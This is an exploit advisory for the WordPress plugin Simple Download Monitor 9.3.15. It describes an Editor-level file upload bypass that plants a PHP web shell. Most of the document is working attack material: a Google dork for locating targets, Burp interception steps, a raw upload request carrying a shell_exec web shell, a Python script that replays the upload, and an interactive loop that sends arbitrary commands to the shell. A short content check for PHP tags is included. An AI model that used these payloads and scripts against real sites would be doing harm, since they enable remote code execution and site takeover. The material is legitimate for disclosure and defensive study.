# Exploit Title: Simple Download Monitor 9.3.15 - Arbitrary File Upload / Privilege Escalation: an Editor can bypass the plugin's allowed-extension list, which can lead to RCE
# Google Dork: inurl:/sdm-downloads/
# Date: 04/01/2023
# Exploit Author: Luth1er
# Vendor Homepage: https://simple-download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/simple-download-monitor.zip
# Version: 9.3.15
A user with the Editor role can ignore the extensions the plugin allows and upload a PHP web shell. The uploaded file keeps its .html name, so the PHP inside it only runs if the target web server hands .html files to the PHP interpreter; confirm that before relying on the shell.
Steps to reproduce:
1 - Log in with an Editor account.
2 - Go to Add New under sdm-downloads.
3 - Under Downloadable File, start an upload with Burp Suite intercepting and capture the request.
4 - Choose your PHP webshell, then in the intercepted request change the filename extension to .html and the file part's Content-Type to text/html, as in the request below.
POST http://localhost/wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 822
Content-Type: multipart/form-data; boundary=---------------------------42010083933333799326780521202
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C5250a3994bfb10de1601bbc2243e838191e8ff24b815a9875190bc8b23837d99; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dfile%26align%3Dcenter%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1672804801; wp_wpfileupload_86a9106ae65537651a8e456835b316ab=f8M5gaey5s2Y9AbpOheTm1ymwc9Waqta; PHPSESSID=002lmr7b4084cao099npqhspnb; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C08158594f72785ab694bfe58473e905d74d352ff23956c602fd739eff55fbd0b; wp_lang=en_US
Host: localhost
Origin: http://localhost
Referer: http://localhost/wp-admin/post.php?post=145&action=edit
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0

-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="name"

webshell.html
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="_wpnonce"

bdc1866b26
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="auto_watermark"

1
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="async-upload"; filename="webshell.html"
Content-Type: text/html

<html>
<?php
$command = $_GET['cmd'];
$command = shell_exec($command);
echo $command;
?>
</html>
-----------------------------42010083933333799326780521202--
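The upload from steps 1-4, as an added example that is not part of the original advisory or of the plugin: a standard-library Python script that rebuilds the captured multipart request so it can be replayed from code, a parser that decodes the body the way a server-side MIME parser would (to confirm the declared name and type are exactly what the attacker chose), and the content-based check the plugin's extension allow-list lacks: look for a PHP open tag in the bytes instead of trusting the extension. Field names (name, action, _wpnonce, auto_watermark, async-upload) come from the captured request; the base URL, cookie string, nonce, post ID and boundary are placeholders, and the embedded shell is the same constructed sample the advisory uploads.

```python
import email
import email.policy
import re
import urllib.request
from typing import Dict, Tuple

# Constructed sample: the advisory's minimal shell, PHP wrapped in HTML so it
# can be declared as a text/html document.
WEBSHELL = (
    b"<html>\n"
    b"<?php\n"
    b"$command = $_GET['cmd'];\n"
    b"$command = shell_exec($command);\n"
    b"echo $command;\n"
    b"?>\n"
    b"</html>\n"
)

BOUNDARY = "----sdm-poc-boundary-0123456789"  # arbitrary placeholder


def build_multipart(fields: Dict[str, str], file_field: str, filename: str,
                    content_type: str, data: bytes,
                    boundary: str = BOUNDARY) -> Tuple[bytes, str]:
    """Serialise plain fields plus one file part as multipart/form-data.
    The declared filename and Content-Type are whatever the caller passes,
    which is the whole bypass: PHP bytes labelled as text/html."""
    parts = []
    for name, value in fields.items():
        parts.append((f"--{boundary}\r\n"
                      f'Content-Disposition: form-data; name="{name}"\r\n'
                      f"\r\n{value}\r\n").encode())
    parts.append((f"--{boundary}\r\n"
                  f'Content-Disposition: form-data; name="{file_field}"; '
                  f'filename="{filename}"\r\n'
                  f"Content-Type: {content_type}\r\n\r\n").encode()
                 + data + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def build_upload_request(base_url: str, cookie: str, nonce: str, post_id: int,
                         filename: str = "webshell.html",
                         content_type: str = "text/html",
                         data: bytes = WEBSHELL) -> urllib.request.Request:
    """Replay of the captured async-upload.php POST. cookie is the Editor's
    session cookie string and nonce the _wpnonce from the edit page; both
    are placeholders the caller has to take from a real logged-in session."""
    fields = {"name": filename, "action": "upload-attachment",
              "_wpnonce": nonce, "auto_watermark": "1"}
    body, ctype = build_multipart(fields, "async-upload", filename,
                                  content_type, data)
    req = urllib.request.Request(f"{base_url}/wp-admin/async-upload.php",
                                 data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Cookie", cookie)
    req.add_header("Referer",
                   f"{base_url}/wp-admin/post.php?post={post_id}&action=edit")
    return req


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Decode a multipart body with the stdlib MIME parser into
    {field: str} for plain fields and {field: {filename, content_type, data}}
    for file parts; this is what the receiving side gets to inspect."""
    raw = f"Content-Type: {content_type}\r\n\r\n".encode() + body
    msg = email.message_from_bytes(raw, policy=email.policy.HTTP)
    out = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        payload = part.get_payload(decode=True)
        if part.get_filename():
            out[name] = {"filename": part.get_filename(),
                         "content_type": part.get_content_type(),
                         "data": payload}
        else:
            out[name] = payload.decode()
    return out


PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def looks_like_php(data: bytes) -> bool:
    """Content check an upload handler should run regardless of the declared
    extension or Content-Type: any PHP open tag in the bytes is a reject."""
    return PHP_OPEN_TAG.search(data) is not None


if __name__ == "__main__":
    # Placeholders: take cookie, nonce and post ID from a real Editor session.
    req = build_upload_request("http://localhost",
                               "wordpress_logged_in_PLACEHOLDER=PLACEHOLDER",
                               "bdc1866b26", 145)
    with urllib.request.urlopen(req) as resp:
        print(resp.status, resp.read()[:300])
```

Run parse_multipart on the body before sending it: if the filename and Content-Type come back as webshell.html and text/html while looks_like_php returns True for the data, the request is the one the advisory describes, and the same three lines are the check that would have blocked it on the server.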
5 - Send commands to the uploaded shell with the script below. The default URL is the path of the file on the author's test instance (WordPress stores uploads under wp-content/uploads/YYYY/MM/); pass the real URL as the first argument.

import os
import sys

import requests

# URL of the uploaded shell; override with the first command-line argument.
SHELL_URL = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost/wp-content/uploads/2023/01/alert.html'

os.system('clear')
banner = r"""
/$$ /$$ /$$ /$$
| $$ | $$ | $$ | $$
/$$$$$$$ /$$$$$$$ /$$$$$$/$$$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$
/$$_____/ /$$__ $$| $$_ $$_ $$ /$$$$$$ /$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$| $$ /$$__ $$ |____ $$ /$$__ $$ /$$_____/
| $$$$$$ | $$ | $$| $$ \ $$ \ $$|______/| $$ | $$| $$ \ $$| $$ | $$ | $$| $$ \ $$| $$| $$ \ $$ /$$$$$$$| $$ | $$| $$$$$$
\____ $$| $$ | $$| $$ | $$ | $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$| $$ | $$ /$$__ $$| $$ | $$ \____ $$
/$$$$$$$/| $$$$$$$| $$ | $$ | $$ | $$$$$$$| $$$$$$/| $$$$$/$$$$/| $$ | $$| $$| $$$$$$/| $$$$$$$| $$$$$$$ /$$$$$$$/
|_______/ \_______/|__/ |__/ |__/ \_______/ \______/ \_____/\___/ |__/ |__/|__/ \______/ \_______/ \_______/|_______/
Version: 9.3.15
Privilege escalation: WebShell
"""
print(banner)

while True:
    exec_payload = input("[+] Payload: ")
    print('')
    if exec_payload == 'exit':
        break
    if exec_payload == 'clear':
        os.system('clear')
    else:
        # The shell passes whatever arrives in ?cmd= to shell_exec() and
        # echoes the output; params= URL-encodes spaces and shell metacharacters.
        resp = requests.get(SHELL_URL, params={'cmd': exec_payload})
        print(resp.text)